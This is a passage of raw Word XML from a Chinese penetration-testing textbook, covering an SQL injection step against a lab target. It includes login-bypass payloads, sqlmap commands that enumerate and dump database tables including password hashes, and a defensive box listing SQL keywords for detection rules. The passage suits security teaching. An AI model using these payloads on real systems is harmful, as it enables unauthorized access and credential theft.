      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应头可能泄露服务器版本（Server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头）、编程语言（X-Powered-By</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头）——这些信息有助后续攻击策略选择。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/backup/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/config/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等敏感目录。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能直接包含一些开发者不希望搜索引擎索引的路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="390"/>
    <w:bookmarkStart w:id="391" w:name="步骤三web-突破sql-注入获取管理员凭据"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤三：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">突破——SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入获取管理员凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入的分类（联合查询、布尔盲注、时间盲注）、手工注入流程以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的使用见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。数据库与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用交互的敏感点（登录表单、搜索框、URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数）也已在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章详述。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术原理直觉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在登录表单的用户名或密码输入框中，攻击者插入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">元字符（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），可以篡改后端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询的逻辑结构，绕过身份验证——这违反了“数据与指令应严格分离”的安全假设①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实操命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（授权靶机内手工测试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具辅助）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. 在浏览器中手工测试登录绕过（payload 为经典示例，有效性因靶机而异③）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># [Username]: admin' OR '1'='1' --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># [Password]: &lt;anything&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. 使用 Burp Suite 拦截登录请求，保存为 login.txt，然后用 sqlmap 测试</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> login.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--batch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2 ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. 若确认注入点，使用 sqlmap 进行数据提取</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> login.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--batch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 列出所有数据库</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> login.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DB_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> --tables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 列出指定数据库的表 ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> login.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DB_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TABLE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dump </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 转储表内容 ②</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">手工测试中，若注入点存在且靶机不防护，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1' --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能使应用返回“登录成功”或跳转到管理面板（因靶机业务逻辑而异）③。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在扫描阶段会输出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[INFO] parameter 'username' appears to be injectable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，随后进行指纹和枚举。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段会输出用户名和密码哈希（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin : &lt;HASH&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），这些哈希可能为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MD5/SHA-1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式（因靶机而异②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示无注入点：确认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">login.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的请求格式正确（尤其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie/Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否过期）；尝试添加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--level=5 --risk=3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（但注意噪声增大）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">手工绕过失败：应用可能对输入做了过滤（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被转义）。尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等变体。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤三】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测与修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测（IDS/IPS）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF（Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Application </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Firewall，Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用防火墙）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort/Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入特征规则。例如，检测请求中包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节规则语法）。注意：签名检测容易产生误报，需结合上下文分析②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测（SIEM）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器日志（Apache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log）接入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM，监控异常长度的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
